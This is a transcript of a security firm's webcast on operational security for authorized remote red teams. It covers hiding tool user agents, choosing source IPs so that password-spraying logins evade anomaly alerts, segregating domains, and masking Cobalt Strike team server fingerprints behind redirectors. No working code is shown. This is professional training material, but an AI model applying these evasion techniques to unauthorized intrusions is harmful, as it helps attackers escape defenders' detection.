Shopping Cart

No products in the cart.

OPSEC Fundamentals for Remote Red Teams

This webcast was originally published on March 23, 2021

In this video, Michael Allen discusses operational security fundamentals for remote red teams. He delves into the importance of maintaining secrecy in red team operations and the potential risks of exposure. Allen provides practical insights on how to effectively secure red team activities, highlighting the use of virtual machines, the control of source IP addresses, and the management of third-party services.

  • Preparation prior to the red team exercise is crucial for a smooth and effective operation, involving reconnaissance and setting up a clean virtual machine environment.
  • Maintaining operational security (OPSec) during red team exercises is essential to avoid detection and ensure success, which includes managing source IP addresses and avoiding default configurations in tools.
  • Testing and vetting new tools before use in red team exercises is necessary to prevent unintended exposure and ensure they perform as expected without harming the user or client

Highlights

Full Video

Transcript

Transcript begins at 25:50 of the video.

Jason Blanchard

Hello, everybody. Welcome to a Black Hills information security webcast. We just have Chris Sanders with us from rural tech fund. We’re helping to support them in the work that they’re doing. We always look for a charity to support with our t shirt sales.

and $2 of every shirt we sell goes to the rural tech fund until the pre order window is over next Thursday. So if anyone’s interested, we’ll drop the link and go to webinar for that.

Today, though, you’re here for a webcast from Michael Allen on Opsec fundamentals for remote red teams. If you have a question at any time, feel free to ask it. But Michael’s got like, 50 to 55 minutes of content today.

So what that means is we have a team of people in the back end that are going to try to answer your question the best we can, either in discord or in gotowebinar. so feel free to ask in Discord or gotowebinar if you’re not on discord, we have a link there.

Just join us in the live chat. It’s got a big red button or big red circle, and that is where we are live right now. And with that, Michael, it’s all yours. I’ll see you in about 50 minutes, unless there’s any complications or problems, and then I’ll pop back on.

But other than that, it’s all yours.

Michael Allen

All right, cool. Sounds good. So, like Jason said, this is Opsec fundamentals for remote red teams. And, my name is Michael Allen.

I go by white rhino online. Been pen testing and doing red teams professionally since 2014. I’m a security analyst now at Bhis been, there since 2019.

Got a few certifications in infosec, but I don’t have any formal training in OpSEC. This is, all this stuff in this talk is just kind of from my own personal experience and stuff that’s been shared with me by others in the community.

Don’t make a lot of mistakes on all the projects that I do. And so I’m just sharing some lessons that I’ve learned today. So, to kick this off, the title of the talk is OpSeC fundamentals for remote red teams.

But I know not everybody might, be familiar with the term OpSeC. So if you’re not familiar with it, that term, OpSEC, it’s a military term. It means operations security.

And this is the definition from Wikipedia I’ve got here on this slide. And there are three main components of this definition that I wanted to point out. So, operation security.

Number, one determines if friendly actions, that’s things we do, can be observed by enemy intelligence. Number two determines if information, obtained by those adversaries could be interpreted in ways that would be useful to them.

And then number three, the friendly side, us, executes selected measures that eliminate or reduce the enemy’s ability to exploit that information that they’ve collected.

And so, you saw the image that was on the title slide, and you’ll see this image here on this slide. Both of these are posters from World war two. These, were OpSec posters from that time.

So they were reminders to anybody. Maybe they’re not even in the military. Maybe they are like military family member or somebody that works in a factory that builds things for the military or something like that.

Even, the smallest, seemingly trivial little details that they might share in passing conversation could give the enemy some kind of information that they could act on to take action, do successful attacks against our side.

The other half of the title remote red teams. In the context of this talk, that’s going to mean, cyber attacks that we do across the Internet for our customers, which is, that’s the target organization in this case is our customers.

They’ve come to us. usually we’ll have, like, a trusted point of contact at any customer, and they are the only one that knows that the exercise is going on.

So it might be a C level executive, it might be someone who’s in charge of the security team, but someone who’s a decision maker who can orchestrate this kind of exercise without letting their security team know that this is going to go on.

Because the security team doesn’t know that this is happening. They are responding to the things that they observe us doing, just, like it’s a real attack, because for all intents and purposes, it may very well be.

Now, this is remote red team specifically, so I’m, not going to talk about physical security or wireless security, and the OpSEc that you would need to consider regarding those types of things if they were in scope.

Also, I’m really only going to talk about things that happened from the beginning of the project up to the initial breach. So, that’s because this content is kind of a spinoff of the content from our red team getting access class that’s coming up.

And that class is primarily focused on those things that happen in the first half of the red team exercise where you’re trying to get that initial foothold. So that’s what I’m going to talk about as far as these red, or, I’m sorry, OPSec concerns here today.

Why is Opsec important for red teams? I said that, these things that we’re doing, they’re authorized by the target customer, but it sounds like what we’re doing is we’re trying to hide some of the evidence of these things that we’re doing.

So why do we care about hiding evidence if what we’re doing is legal and we don’t have to worry about any legal repercussions? Well, one thing is the way that the Infosec community and infosec industry works is that the adversary side, the offensive security side, and the defensive side share information together about how successful attacks happen, about how things are successfully defended.

So because of that, we really don’t have any, secret weapons that we’re going to, something we’re going to do that the blue team couldn’t potentially see coming ahead of time.

They have the potential, they have the resources, and the information is out there available. So, they could be expecting pretty much anything that we’re going to do. So, we want to have every advantage that we can possibly have, the element of surprise, that type of thing.

We don’t want to give away these actions before they actually happen. Also, modern blue teams have access to information that doesn’t just consist of the things that they can observe themselves.

Traditionally, blue teams have always had access to the logs on their Internet facing systems where, things are interacting with those systems coming in from the Internet. They’ve also had access to the logs on their internal systems that are making connections out to the Internet.

But in addition to those things, they can also get intelligence from third parties. Who are these services that are going out and say, scanning things on the Internet and, finding suspicious behavior whenever it can be detected ahead of time.

So services and servers that are being stood up, that are running suspicious services, maybe like suspicious domain names that are being registered, anything like that.

These threat intelligence services, they can identify these things and provide that information to the blue team. And then the blue team can use other tools to analyze and correlate that information along with their own information that they’ve collected from their own systems and draw some conclusions that can be really detrimental to the things that we want to do as red teams.

Like I said, they could potentially stop things before they happen. So the analogy that I like to use to describe this kind of situation is the analogy of a, connect the dots picture.

So I’ve got a really simple connect the dots diagram here. And basically, the red team does not want the blue team to connect the dots. And every time that the red team does something that’s observable by the blue team, the red team is leaving another dot behind.

So, with enough of those dots, like you can see in the picture here, the blue team can complete the entire picture, and, they can see who the red team is, what, tools or infrastructure they’re using, and they may even be able to prevent those attacks before they occur.

That’s really, really frustrating if you’re on the side of the red team and before you realize that the blue team was, able to figure out who you were or what you were going to do, they’ve already done it.

And that when you’re in that situation, you’re trying to do attacks or whatever, and those things just aren’t working and you don’t know why. So we have to come up with some possible countermeasures that the red team can do to try and frustrate the blue team whenever they’re trying to connect these dots.

The first one is just don’t leave any dots behind. So you’ll see in the diagram, I’ve erased some of the dots that were there. So it makes it a little bit more difficult to, connect the dots and draw the picture of the rhinoceros, but it’s still possible.

And this would be kind of akin to like a burglar who’s, about to, break into a house, putting on gloves. And what they want to do is they don’t want to leave any fingerprints behind, so they put on those gloves to cover up their fingerprints.

So kind of like that we try to do actions that don’t leave any evidence of that action behind. Number, two, whenever we can’t help but leave a dot, we try not to leave other clues that associate that dot with any other dots that we leave behind.

So to represent that in the diagram, I’ve taken away the numbers from the remaining dots. So, again, this is a pretty simple diagram, still pretty easy to see. It draws rhinoceros. But, in a more complex scenario, maybe there aren’t some lines there to help out.

It might be a little bit less obvious what all of those dots are indicating. And then number three, to create dots that associate dots with other unrelated dots.

So that basically just means, like, leaving disinformation to do things that are going to frustrate efforts to draw relationships between the evidence that’s left behind, because it leads you off down a different path.

Just like if you were to follow the numbers in this diagram, they would not draw a rhinoceros anymore. Now, in this webcast, I’m only really going to be talking about number two.

The reason for that is number one has more to do with the, things that we do say during passive recon whenever we’re interacting with third parties to try and gain information about our target and or we’re doing other things that just, they would have no ability to see that we’re doing that, really.

And number three, the disinformation part, we don’t really ever do that on any of the red team exercises that I’m involved in. One reason is because our timeframe is, like, for the whole red team exercise, we have a set timeframe.

It’s already pretty short. Then for the portion that I’m talking about in this webcast, we’re talking about half of that. So we really just don’t have time to go out there and do a whole bunch of extra stuff to confuse things any further.

We’re usually trying to move the ATT and CK forward throughout the entire thing that we’re doing, the portion of the red team that we’re responsible for. So I won’t be talking about either of those in this webcast.

They certainly could be used in those contexts. There are also other threats to the red team beyond just the blue team that we should also, be wary of.

One is data leaks, and these could be data leaks that are observed by anyone. So I’m sure you’ve all heard of, like, Amazon s three buckets being exposed to the Internet insecurely and there being all kinds of data in there about customers or something like that.

Well, if the red team was to leak information about themselves or their customers, that would be really damaging to the company’s reputation. It could be damaging to the customers, could violate non disclosure agreements or things like that because customers don’t usually want you to tell everyone that, who they had doing their security testing.

So, that would be one very damaging thing that could happen based on the information that we’re leaking out there on the Internet. The other thing that’s bad that could happen is we could be attacked by real world threat attack or threat actors.

So, there’s always these threat actors out there on the Internet who are scanning network services and looking for ways to attack stuff that’s out there.

And when we’re operating on a red team, we’re setting up servers, we’re running network services, we’re doing all the things that you normally do in any type of technical job that involves computers and the Internet.

And we, always also have to be wary that there are real world attackers out there while we’re trying to be the attacker doing our red team exercise. So I’ve broken the process for assessing red team actions down into these four steps here.

So first of all, we want to plan any likely actions that we’re going to do on any given red team exercise. We’re always going to do recon. It’s very common that we’re going to do like password guessing, very common that we’re going to do some phishing, stuff like that, that, we know ahead of time that we’re probably going to do that, we want to go ahead and plan that out.

And then after we plan that, go ahead and brainstorm some of the things that we think might be disclosed by those actions that we’re going to take. Some of these might be obvious, and some of them might not be obvious, but really think deeply about what kind of information could be disclosed or observed when we take those actions and then assess whether that information that we disclose could, be used against us in some way.

So thinking about, what is that information that we’re disclosing? Because the nature of the information itself is going to determine whether it could be used against us or not.

Maybe also who can see it. So if we’re sharing it with a third party, but we expect that we have a reasonable level of privacy with that third party, maybe it’s not quite as much of an issue.

And is it likely for that information to be used against the red team then number four, adjust our plans, to mitigate those risks so that we can take care of that ahead of time before it becomes an issue.

And when I’m doing this on my own, looking at this from the perspective of my own procedures and stuff that I do on red teams, I try and build this into my procedures so that in the future I can repeat the same process.

And I’m constantly getting better at this. So the process I use to do that is to just document those steps that I’ve taken and then apply them, go through that documentation.

Whenever I’m doing those phases of the red team exercise in the future. This would apply to any phase like setup, reconnaissance attacks, those kinds of things that I mentioned that you do pretty much every single red team exercise.

You also want to apply these, this process before you use any new tools or techniques. by setting up a test environment and seeing what those new tools or techniques look like from your targets point of view.

So you can see, are they seeing anything that looks suspicious? And also get into that in a little bit more detail as well as we go through this. So my standard operating procedures for red team OpSeC, it’s kind of, I got it broken down into five sections here.

There was a little bit more to begin with, but I had to cut down on some of the content to make this fit into an hour long webcast. So this is just kind of the highlights. First, we’ll start with local workstation setup.

On my local workstation that I operate from whenever I’m doing a red team exercise or a penetration test or anything like that, I use virtual machines. And these are really convenient for many reasons.

Outside of OpseC, I can get all my tools configured just the way I want them to be. I have everything installed on there. Really saves a lot of time as far as setup for each project.

But from that OPsec perspective, I can go ahead and configure everything so that it’s not leaking any information about the stuff that I’m doing.

So, using my best practices that I’ve identified previously, I’ve also got a clean environment so there’s no artifacts left over from other customers, nothing left over from any research I’ve done, anything like that.

everything’s fresh for every single project and then it’s really easy to deploy additional vms if I find that I need another virtual machine to work from on that same project.

Also, the VM images can be updated and modified without having to rebuild them from scratch by using the snapshot feature. So I make use of that all the time. that way I only really have to rebuild my VM like maybe once or twice a year.

That’s maybe more frequently than I really need to, but I just like to do that so that I have everything exactly the way I want it. I also keep a checklist of the way that I’ve configured everything on the vm.

So that way as I’m building it the next time I can just go through that checklist. And I added that every time. Also, using a virtual machine gives you a little bit of extra protection against accidental compromise.

Something to think about is whether you’re using tool that’s been vetted, or accepted by a lot of the security community, or whether you’re using a tool that you just now found today.

These are all hacking tools that we’re downloading from the Internet that were made by other hackers. It doesn’t matter if it’s maybe Kali Linux or something that’s built in one of those tools that’s included with it or something else.

There’s always that possibility that there could be something in there that you didn’t know was there. That’s, that’s going to do something that you didn’t want it to do. The basic layout organization of my virtual machines that I use is kind of described here in these bullet points.

So on the right there you’ll see a picture of virtualbox. That’s what I prefer to use for running these virtual machines. But there are several different virtualization solutions you can use. I just like that one because it’s free.

Kali Linux is pretty straightforward. It’s got a bunch of tools already installed on that vm and I just add a few more to it and configure the interface the way I like. And that one’s pretty good to go.

The windows ATT and CK Vm. That one I have set up specifically to run any ATT and CK tools that are windows specific and to test any executable payloads before M, before I test them against antivirus or anything like that, is to test them just to make sure they actually execute and do what they’re supposed to do.

I make some configuration changes to that Vm. I disable all the defenses on it, so it doesn’t have any firewall or antivirus that would get in the way of getting those executable payloads to work.

I also make some changes to my browser configurations and stuff like that. So that one’s pretty heavily modified. Now in contrast to that, the Windows test vm, is stock.

It is the latest build of Windows. I don’t install any extra libraries, no development tools, nothing like that. That way I can test on that machine if my payloads are going to be portable to other Windows systems, if they’re going to run successfully without requiring any dependencies or anything that’s not there.

I also leave all the defenses intact so that like for example Windows Defender, that’s on most Windows systems, I can test my payloads, against Windows Defender. If I find out that my target has any additional antivirus or endpoint protection software installed in their environment, I’m going to install that on there so I can test against it as well.

I also use this VM, for authenticated connections to the network since it is the most stock and most configured similarly to their actual workstations of the vms that I use.

So some specific modifications that I make to the operating systems. First of all, setting a strong password. Of course, like I said, there are real threat actors out there so we need to take best practices to keep our system safe.

But I also change the hostname and local username. You’ll notice I’ve got remote and on site noted here under the hostname and local username. What I’m trying to do is make my system look as benign as possible.

Now if I was on site when I’m setting this host name, I’d probably set it to something like printer or deskjet so that maybe it looks a little bit like a printer that someone’s plugged in at their desk.

Maybe they went to Home Depot or office depot and they bought a printer and they plug it in at their desk. It’s just going to show up on the network as maybe printer or deskjet or something like that. But if you see printer or desk jet talking to your network from the other side of the Internet, then that’s going to look pretty suspicious.

So there’s a difference in context there. So for remote testing I’m going to use a name like localhost or desktop or PC, something really generic and that’s what I set it to out of the gate.

But after I’ve done some recon and I’ve figured out maybe the internal host naming scheme or maybe some real internal host names and internal usernames as well, I’m going to change those settings to make that match what I’m seeing in the target environment.

You might be asking, well, it’s my local host name. How is this going to get exposed during a red team exercise or something like that? Well, when you’re interacting with services that are operated by your target, there’s plenty of opportunity for them to either intentionally or unintentionally set things up that are going to get, some of that information from your computer.

So you might be interacting with a service that uses NTLM authentication, and during those authentication requests you might not even see them happen. It could potentially elicit your username or hostname, again with honeypot documents.

That’s another opportunity. If you download those documents from the target’s website and they’re made to call home, they can get your username or your host name and they can send that information back.

I’m always looking out for that kind of thing. really, the biggest thing in my mind whenever I think about this is stuff that I don’t know that could be used against me. There’s not really any good reason that I can come up with why my host name needs to be hacker computer, or my username needs to be like zero cool or something, or white rhino in my case, whenever I’m doing a red team, because that information can get leaked.

And that would be really embarrassing to have that information used against you by the blue team because of some kind of leak like that. You also might ask, why change the domain name?

This brings up another way that this information can get leaked. I mentioned that my test vm I use for connections to the target environment.

So it’s really trivial for VPN servers and the client software to enumerate different configuration settings on your computer and report that back to the VPN server.

They can report back things like the domain name that your computer is connected to, the host name, your username, and whether it’s a domain user or not, your operating system version and patch level, whether expected antivirus products are installed, all kinds of stuff like that, because your VPN client is usually running with elevated privileges on the system that you’re running it on.

So it would be very easy for a blue team to alert on an incoming authenticated connection to their network that is from a computer that is not joined to the domain, at least that has this, at the very least has the same name as their domain, if not a actual computer that’s joined to their domain.

So because that’s so easy for them to do, and because products actually support that, that’s something that I watch out for. So I try and make my test vm, configured as closely as possible to the way that their actual workstations are configured.

It’s also really useful whenever you’re keying payloads to execute in their environment because that way you can test and make sure if I run this on a computer that actually is connected to a domain with the same name as the machine that it’s intended to run on in that environment, is it going to execute and is it not going to execute if I run it on my other Windows Vm that doesn’t have the same domain name after I’ve configured my operating system I then go in and configure all the individual tools.

One setting that is seen in a lot of tools is the user agent header. This would be in pretty much any tool that is going to interact with a web server and make web requests.

Things that that sends to the web server are your browser software and version number of that browser software or whatever that client is if it’s not a browser. Also the operating system and sometimes the operating system version number.

So for some examples of that I’ve got two screenshots here. I got Kali Linux default web browser user agent up at the top and Windows edge web browser down at the bottom.

All I’ve done to get this information is just go to duckduckgo, type in user agent and at the top of the search results it tells me my user agent, you can see that in the Kali Linux user agent string that it actually says Linux x 86 64.

So it’s reporting that this is a Linux system and also Firefox 78.0. So it’s reporting Firefox in the version that we’re running now. In and of itself that might not be really suspicious because lots of people run Linux maybe.

And that user agent might be used by a lot of machines on the Internet but that user agent is definitely used by every Kali Linux system on the Internet.

So that immediately makes that kind of suspicious to me. Some other more suspicious user agents are like the ones that are sent by nmap and wpscan.

And these are just a couple of examples. there’s examples of this kind of thing in many hacking tools and this is something that you always need to go in and change. So the top screenshots up here show the Inmap command that I ran and then the user agent that was observed and you can see it’s telling you right there in the user agent Nmap scripting engine and then it’s got the URL to the Inmap documentation.

Same thing for WP scan which is a scanner used for scanning WordPress websites got the name of the tool, the version number and a URL for accessing the WP scan documentation.

So those things right there are going to be big red flags to the blue team if they see a whole bunch of requests coming in from Nmap or WP scan or any other known hacking tools.

What you want to do is you want to change those. And what you would want to change them to is something that they’re going to see on a regular basis that is not going to give them any suspicion at all.

In particular, you probably want to change them to something whose traffic is going to be similar to the things that you’re doing. So for example from like in map or from WPscan where these scanners are potentially making a lot of web requests to the web service, you might want to use the Googlebot user agent and that’s the user agent that’s sent whenever Google search engine goes out and indexes a website.

So it’s the kind of thing that’s going to be making a lot of web requests. In contrast, if you’re using a web browser and maybe you don’t want to be sending that default user agent of the Kali Linux browser, then you could use the Google Chrome on Windows ten user agent.

So I completely throw them off, tell them it’s Google Chrome, it’s on a different operating system. And that’s a very common user agent. You can actually go out and search online and find out what’s the most common user agent at any given time.

My slides got stuck. Okay, so some examples for how you would actually change that user agent. I’ve got some command line examples here.

What I’ll typically do, I want pretty much anything that I do. I want to try and make it fail safe so that if it fails it’s safe for me. So what I’ll do is I’ll create some aliases in my RC file, in my Linux environment, the bash or zsh rc file.

And those aliases, what they do is like if I run curl or wget and I forget to use the flag to change the user agent, then they’re going to go ahead and set that user agent for me.

So that way if I forget it doesn’t forget, it takes care of it. I also set that user agent in an environment variable. You can see here up at the top of this box, I’ve got it set in the agent variable.

What that does is that lets me reuse that really easily without having to go and copy and paste it from somewhere right into other commands. If there’s a command like down at the bottom I’ve got wp scan, I want to throw the user agent into that command, but I don’t want to have to go dig it up and I don’t want my copying and pasting to be prone to user error.

Then I can just throw dollar sign agent in there and it’s going to fill in the blank for me. Changing the user agent for your web browser is equally just as simple. You can use extensions like for Firefox for example.

I linked to the user agent switcher and manager extension. But I like to do it manually myself. The reason that I really like to do it manually is because I try and keep as small of a number of tools installed on this, on my testing systems as I can because each tool is another tool that I need to vet and I need to trust.

So if it’s an extension that’s made by somebody who I don’t know and I haven’t vetted that extension, I’d prefer to do it manually. So if you follow the numbers and the screenshots there, it’ll walk you through changing your user agent.

In Firefox it’s really simple. You just open up the about config and change one setting in there. There are other ways that browsers can leak information about the things you’re doing as well.

This screenshot is from the Google Chrome browser. So I’ll read you this text because it’s kind of small. It says sends URL’s of some pages you visit and some page content to Google to help discover new threats and protect everyone on the web.

That’s pretty much the opposite of what I want as an attacker. I definitely don’t want URL’s or page content of my phishing landing pages or anything like that getting sent back to Google.

And I definitely don’t want everybody using the Google Chrome browser to start getting alerts that pop up and say this website’s malicious. That would be pretty terrible. So make sure you turn all that stuff off.

You might make your browser decisions that you’re going to use on your systems based on some of this information about what they leak. And you may use different browsers at different stages in your process as well.

So early on, whenever maybe everything’s not set up Opsec safe, you’re not filtering any user agents that are coming in or things like that from external connections to your phishing server, then maybe don’t use browsers that are going to leak that kind of information during that phase of the exercise.

After I’ve assessed my own local system locally, I’m going to take a look at source IP addresses that I’m using whenever I do different steps of the attack or the recon.

And I’ve noted three different criteria here that might make an IP address suspicious. So we’ve got association with other suspicious traffic, the physical location associated with the IP address and the service provider and type of connection.

Those two I kind of lumped together in number three because I think they’re kind of related. And I’ve got a list of some of the different types of, type of connection.

a connection might be categorized as and in the screenshots. These are two different screenshots taken from looking up two different IP addresses on whatismyipaddress.com and the information that was immediately available whenever I looked up those IP addresses.

So you can see, like on the right hand side screenshot we’ve got the ISP, the organization that the ISP is like, those are the same for that one. The services that have been observed from this IP address, the type, is it corporate or residential?

Is it a static IP address? What location is the IP address coming from? So all of those things are immediately available just by typing in IP address.

And the blue team also has access to that information so they can very quickly categorize the IP addresses that you’re operating from and they may block some or do other actions based on that categorization.

The screenshot on the left was the screenshot of doing the same test while connected to the Tor network. And you’ll see that under services there we’ve got confirmed proxy server, tor exit node, and recently reported forum spam source.

So this is going to be an extremely suspicious IP address to be operating from. So those are things to take into account. You want to make sure you vet your IP addresses that you’re coming from before you do anything with them.

Some countermeasures, that you can use whenever vetting those source IP addresses or whenever you’re trying to disguise some of your actions or prevent the blue team from catching on.

One, never use the same IP address with any two activities that you don’t want associated with each other. So just like in the previous slide, one of those IP addresses was already associated with, your forms being spam.

You might be doing some port scanning or something like that. You don’t want to do, say, phishing for example, or hosting your malicious payload on the same IP address that you just used for port scanning, you, want to use totally different IP address for that.

Also, IP addresses should make sense relative to your actions from that IP. using this in the context of logging, into user accounts as you get usernames and passwords and you want to test them.

First off, use just one IP address for each user account and keep using that same IP address for all logins to that account. like when you’re working from home, you’re logging in from the same IP address every day, and probably nobody else that you work with is logging in from your IP address.

That’s how it happens in the real world. So you want to mimic that behavior as much as possible. Also log in from an IP address that’s in the same region as the user that you’re targeting.

And you’ll see this screenshot on the right hand side. That was from Gmail. And to get that screenshot, all I did was I just logged into my Gmail account from an IP address that was in a location that I didn’t normally log in from.

They automatically sent me a message saying, hey, we noticed a new device. In this case is how they worded it. But that was the suspicious thing. It was still the same user agent, same web browser, everything was the same, except I hadn’t logged in from that IP address before.

So this is really common for Gmail, for office 365, for a lot of services on the Internet, they’ll send you these kind of messages.

And since those services can do that so easily, we can also infer that the blue team can probably do that just as easily. And if they’re using any of those services, like many organizations are using Office 365 internally, then those features are already built right in.

So, that’s something we definitely have to watch out for, because if we don’t watch out for, that user is going to get that message, they’re going to go in, they’re going to change their password because they say, hey, I didn’t just log in from some IP address in Transylvania.

And after they changed their password, we’re not going to have access to that account anymore. That might have been the only account that we had. Also login from a service provider.

That makes sense for the target user. So probably not a vps. Most companies probably don’t have their employees logging in from some random computer in Amazon AWS or, in azure or something like that.

And like I said before, avoid those known suspicious ips. Tor exit nodes already suspicious. Public proxy servers already suspicious. So watch out for those kind of things whenever you’re logging into user accounts.

Also, when you are using a VPN, make sure your VPN connection fails safe. Like I mentioned that, fail safe term before. If I’m the middle of a password spraying attack and it’s running from my system, but I’m connected to a VPN and then in the middle of that password spraying attack, my VPN connection goes down.

Everything else is still working, but the VPN connection goes down. What’s going to happen in many cases is that that password spraying is going to continue, but now the source is going to be the IP address at my house and I don’t want that, especially if you’re testing say a big content delivery network and they blacklist your IP address and now you can’t access a lot of the content on the Internet.

This first box here is the command that I use whenever I’m connecting to an open VPN VPN server that runs this script that’s listed in the second box.

And what that does is if my VPN connection goes down, then OpenVPN will run that script for me and that script will just bring all of my network interfaces down so that now my vm is no longer connected to the network whatsoever.

So maybe that, it keeps trying to spray those passwords, but they’re not going anywhere and I’m definitely not generating that malicious traffic and that’s what I want.

Other third party services, so, meaning other in like as an addition to your source IP addresses that we just covered. Whenever you’re looking at new third party services that you’re going to use during a red team exercise, assess whether that information or, registration information that you provide them is likely to be exposed to the public.

Some third party services do expose that information publicly. Also assess whether the use of the same account across multiple projects might leak information about you or your customers.

could someone on the Internet say, like just identify that all these accounts are owned by the same company, and they’re named in such a way that we can tell that their customers are customer a, B and c, maybe something like that?

Or could they tell that you’re the one that owns that account? Maybe it makes more sense to set up brand new third party service accounts for each red team exercise that you do in order to have that extra layer of security.

Also identify any additional areas of concern. This, is going to be different for every service that you use. Some services may have extra features or other things.

Just the nature of the service may bring up other opportunities for information to leak out. One of the third party services that is really commonly used by us on red team exercises is domain name registrars.

We’ll go out and we’ll register new domain names either in preparation for red team exercise down the road, or maybe during an ongoing red team exercise. One thing you want to make sure you do is always turn on private registration.

It’s also called who is privacy? And make sure that’s enabled by default on your account. You want to make sure that when you register the domain there is not a gap between when the domain was actually registered and when that whois privacy was enabled on the domain.

And the reason for that is there are third parties out there who are logging that registration information and they have databases that can be queried to find historical Whois information.

And your information will show up in there if the privacy was not enabled right out of the gate. Also, just like with IP addresses, you want to segregate the domains by whatever purpose you’re using them for.

So you don’t want to send email, serve your payload files and receive c two callbacks all from one domain. Now do each of those things from a different domain. Every action that you do ideally should come from a different domain name.

Or if you’re going to do multiple actions from the same domain name, maybe it’s actions that you don’t care as much about them being associated with each other. Some other concerns about domain names.

Typo squatting has been a pretty common red team tactic for a few years, but these days it’s not really safe to do. There are services out there that will detect typo squatting and when you register a domain that is mimicking one of their customers, they will send an email to that customer telling them, this domain was just registered and it’s pointing at such and such IP address and then the blue team can act on that.

These services also detect subdomains. So I went out to the DNS Twister website and I just typed in blackhillsinfosec.com and immediately got back three cases of typo squatting in the results.

Now if you look closely at those, you’ll see that the first one is just a domain. It’s blackhillsinfosec.com and it’s missing an l in the word hills. But the second and third in those ones that I’ve got circled, there are actually subdomain and parent domain names that combine to spell black hills infosec.

So like the first one is black hillsin dot fosec.com. so just because you get tricky with your subdomain naming doesn’t mean that that’s not going to get detected.

This took no time to come up. This was instant. And these services, they will alert the blue team to that kind of thing immediately. Also, Ssl and TL’s certificates.

When you generate these certificates from certificate authorities, that information can also be exposed like in certificate transparency logs. And this is something generating those certificates that we also do very commonly during red team exercises.

So say for example, if you have a domain, maybe it’s a generic sounding domain name, but use customer names for the subdomains of that domain and that’s what you use during your exercises.

Well, if you reuse that across multiple customers, then that information could be leaked. If you generated an SSL certificate for each of those subdomains, someone could just go out and query the certificate transparency logs for that domain and find all of those subdomains and that could expose the names of all of your customers.

Also you could expose your work email address in the certificate itself if you use it to register for that certificate. So that would be a dead giveaway.

If the blue team is they’re investigating some server out on the Internet, they’re suspicious about it. They investigate the SSL certificate and looking through it, they see ma allenlackhillsinfosec uh.com, then that’s going to be dead giveaway that this is part of a red team exercise.

So you don’t want that. I always use the register unsafely without email flag whenever I’m requesting a certificate from let’s encrypt for that reason. So I’ve included that command there.

Also, don’t ever use any default or self signed certificates. They’re very easy to either flag or block self signed certificates. It would be very easy to just create a rule that would block all of those outright and then the default certificates.

Anything that’s default in the hacking tool is a bad idea on a red team exercise. So here I’ve got the fingerprint for the default certificate that comes with cobalt strike.

That was just up on the cobalt strike blog. So that didn’t take any effort for me to get or anything. And I went out to census IO and searched for that and sure enough, I found 362 team servers out there on the Internet that are using this default certificate.

So I really hope they’re not running red team exercises right now. Hopefully they’re just testing out cobalt strike. Also something else to think about as you start thinking about these ideas is a lot of hacking tools and tutorials that you find online.

They mention let’s encrypt as the default certificate authority to get those SSL or TL’s certificates. And any kind of default like that you want to be suspicious of.

They’re also free, which makes them very likely to be abused by attackers. And really the only thing that maybe makes them worthwhile still is because there are a lot of legitimate websites that are also using those let’s encrypt certificates.

But that’s just something to think about. Maybe it would make sense to kind of mix up where you’re getting certificates from in future projects. if you’ve been getting them all from let’s encrypt.

So next is network services, just like I mentioned earlier. there’s threat actors out on the Internet just like anybody who’s running services and servers on the Internet.

Best practices to not expose any services that aren’t required to be exposed. So if there’s anything that you can, just block all incoming access to just go ahead and do that.

And if it’s something that only the red, red team needs access to, use SSH port forwarding for the red team to get access to it. The reason I recommend SsH port forwarding instead of like IP tables rules and ip whitelisting and stuff like that is it’s kind of easy to mess up the ip whitelisting or blacklisting rules and accidentally have too much access and maybe you’re letting in too many IP addresses.

But if you just block everything and the only way to access that port is by forwarding a port over Ssh, it’s much easier to get that right. Also change any default ports that do have to be exposed that are changeable in the context of whatever you’re doing with them.

Of course you wouldn’t change the default ports that were available for a web server because those need to be the default ports. But if it’s something you can change, change it. And also use redirectors as much as possible.

And in the case of any web servers where you’re running redirectors, if you have like a HTTP or HTTPs beacon for example, use legitimate web services like Apache and Nginx to redirect that traffic to your c two server.

On this next slide, I’m going to walk you through each of those things I just talked about and describe some indicators that came from the cobalt strike team server study. This was published on the cobalt strike blog.

So none of this came from me. This all came out of a blog post on there. But these really help illustrate some of those things that I was talking about. So indicator number one is tcp port 50,050.

That’s the default cobalt strike team server report. So that’s a dead giveaway right there. That cobalt strike is running on this system. If you see that port 50,050 is open, so definitely don’t expose that to the Internet.

Have all your red team operators connect to the SSH service and then forward their traffic to that port, locally inside the firewall. Also very similar to that if you’re using DNS for beaconing.

The cobalt strike DNS server responds to DNS requests with an IP address of zero, zero. So again very suspicious, very positive confirmation that that is cobalt strike team server that’s running there.

So something that you don’t want, you can go into the malleable c two profile and change that so that there’s a different default set so that you’re not broadcasting to the world that this is a team server.

And then touching on those redirectors that I talked about on the last slide. So if your team server is listening with an HTTP listener and you don’t have any content specifically specified for the root of the web server with cobalt strike, it’s going to give you a 404 not found error.

When you browse to that root web root location, it’s going to have no content in the page and it’s going to have a content type of text plain. And that response is a pretty good indicator that there may be a team server running there as well.

In addition to that, the JA three s service fingerprinting can be used to add another confirmation that there’s probably a team server running.

So this type of fingerprinting, what it does is basically each different type of network service that’s running, be it Apache web server or an NginX web server or a cobalt strike web server or whatever others.

Each one is going to generate its own fingerprint whenever it receives incoming traffic. And that fingerprint can be used to identify whatever is there since that fingerprint is going to be the same across other similar web servers.

Well, there are thousands of Apache or Nginx or other dedicated web servers out on the Internet, but there’s a relatively very small number of web servers on the Internet that have the same fingerprint as cobalt strike team servers have the fingerprint that they have is a Java based web server fingerprint because there’s such a small number of servers that would be something that blue teams could also alert on that would signal that this is probably a cobalt strike team server.

But if you have HTTP or HTTPs redirectors set up that are running on real web servers, Apache, Nginx, others like that, and they forward those web requests to your team server, then the fingerprint is going to be detected and the 404 not found page that’s going to be displayed for any pages that are not found is going to be the fingerprint or the 404 not found page of that web server.

It’s not going to be the one that your team server provides. That way you get a little bit of extra protection so that way it’s not as obvious there is a team server running on the other side of that redirector.

Lastly, testing new tools. So anytime you use a new tool that you haven’t used before, you want to vet that tool. You want to do three things. You want to make sure that the tool will not harm you or your customer.

You want to identify and mitigate any tails that could give away your attack to your target. And also number three, you want to make sure that the tool does the thing it’s supposed to do.

That’s how I prioritize those things. Number three is pretty important because if it doesn’t do what it’s supposed to do, it’s, there’s no point in running it, but you have to go through the process of, making sure that it’s going to cause no harm and it’s not going to give you away.

In addition to making sure it actually does the thing that it’s supposed to do. And these are my steps for vetting a tool over here on the right. I’m not going to claim to be very good at probably any of them, but those are the ones that I recommend.

I’ve also got some recommendations in that bottom bullet for how you can observe the traffic that the tool generates. We don’t always have access to the software that we’re targeting with any new tool.

